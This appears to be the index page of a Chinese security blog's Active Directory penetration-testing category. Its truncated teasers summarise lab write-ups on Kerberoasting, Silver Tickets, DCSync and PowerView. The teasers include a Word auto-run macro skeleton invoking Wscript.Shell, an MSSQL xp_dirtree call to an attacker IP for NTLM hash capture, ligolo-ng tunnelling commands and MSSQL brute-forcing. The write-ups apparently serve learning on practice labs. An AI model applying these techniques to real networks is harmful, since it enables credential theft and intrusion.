AD域渗透共39篇
对 Active Directory 身份验证执行攻击3  Kerberoasting-白鸢的笔记

对 Active Directory 身份验证执行攻击3 Kerberoasting

回想一下 Kerberos 协议是如何工作的。我们知道,当用户想要访问由服务主体名称 (SPN)托管的资源时,客户端会请求由域控制器生成的服务票证。然后,服务票证由应用程序服务器解密和验证,因为它...
zhyann的头像-白鸢的笔记钻石会员zhyann1年前
08115
客户端攻击1 word宏攻击-白鸢的笔记

客户端攻击1 word宏攻击

1. 创建一个doc文件 不要docx的 2. 开始创建宏 3. 宏病毒框架Sub AutoOpen() MyMacro End Sub Sub Document_Open() MyMacro End Sub Sub MyMacro() #这里写命令 CreateObject('Wscript.Shell'...
zhyann的头像-白鸢的笔记钻石会员zhyann1年前
05313
AD Enumeration with PowerView-白鸢的笔记

AD Enumeration with PowerView

PowerView脚本#requires -version 2 <# PowerSploit File: PowerView.ps1 Author: Will Schroeder (@harmj0y) License: BSD 3-Clause Required Dependencies: None #> ##################...
zhyann的头像-白鸢的笔记钻石会员zhyann1年前
0629
红日靶场3.2 隧道建立与内网横向-白鸢的笔记

红日靶场3.2 隧道建立与内网横向

隧道建立使用ligolo-ngkaliip tuntap add user root mode tun ligolo ip link set ligolo up proxy -selfcertweb./agent -connect 192.168.0.103:11601 -retry -ignore-certkalisession 1 start...
zhyann的头像-白鸢的笔记钻石会员zhyann1个月前
0459
对 Active Directory 身份验证执行攻击4 Silver Tickets-白鸢的笔记

对 Active Directory 身份验证执行攻击4 Silver Tickets

在对 Active Directory 身份验证执行攻击3中,我们获取并破解了 TGS-REP 哈希以检索 SPN 的明文密码。我们将更进一步,伪造我们自己的服务票证。 Kerberos 身份验证的内部工作原理,在服务帐户...
zhyann的头像-白鸢的笔记钻石会员zhyann1年前
07911
Medtech 堡垒机 seimpersonateprivilege 提权-白鸢的笔记

Medtech 堡垒机 seimpersonateprivilege 提权

靶场信息外网三台主机地址 1. 漏洞挖掘与利用扫描VM4gobuster vm4sqlmap注入可以爆破 先尝试能不能拿到NTLMhash先监听接口responder -I tun0exec master..xp_dirtree '\\192.168.45.229\test'...
zhyann的头像-白鸢的笔记钻石会员zhyann1年前
0718
PsLoggedOn-白鸢的笔记

PsLoggedOn

NetSessionEnum 会在高版本的操作系统不起作用我们可以使用PsLoggedOn工具来代替 PsLoggedOn简介PsLoggedOn 将在HKEY_USERS下枚举注册表项,以检索登录用户的安全标识符 (SID)并将 SID 转换...
zhyann的头像-白鸢的笔记钻石会员zhyann1年前
0546
红日靶场3 补充 mssql爆破-白鸢的笔记

红日靶场3 补充 mssql爆破

在win2008上扫描到了mssql 使用之前收集到的用户名和密码testuser cvcvgjASD!@wwwuser wwwuser_123Aqx 直接复制到/tmp/user.txt中use auxiliary/scanner/mssql/mssql_login set rhosts 192.16...
zhyann的头像-白鸢的笔记钻石会员zhyann1个月前
0519
域控制器同步-白鸢的笔记

域控制器同步

在生产环境中,域通常依赖多个域控制器来提供冗余。 目录复制服务 (DRS) 远程协议使用复制来同步这些冗余域控制器。 域控制器可能会请求更新使用 IDL_DRSGetNCChanges API 的特定对象,例如帐户...
zhyann的头像-白鸢的笔记钻石会员zhyann1年前
08210
红日靶场1.1 mysql拿到reverseshell-白鸢的笔记

红日靶场1.1 mysql拿到reverseshell

实验环境1. 信息收集由于我当时没注意到是win7是入口机器 所以先扫描windows server 2003nmap -T5 -A -p- -n -vvv -noscript 192.168.52.141先从ftp开始发现可以匿名登录 但是里面是空的简单爆...
zhyann的头像-白鸢的笔记钻石会员zhyann1个月前
04214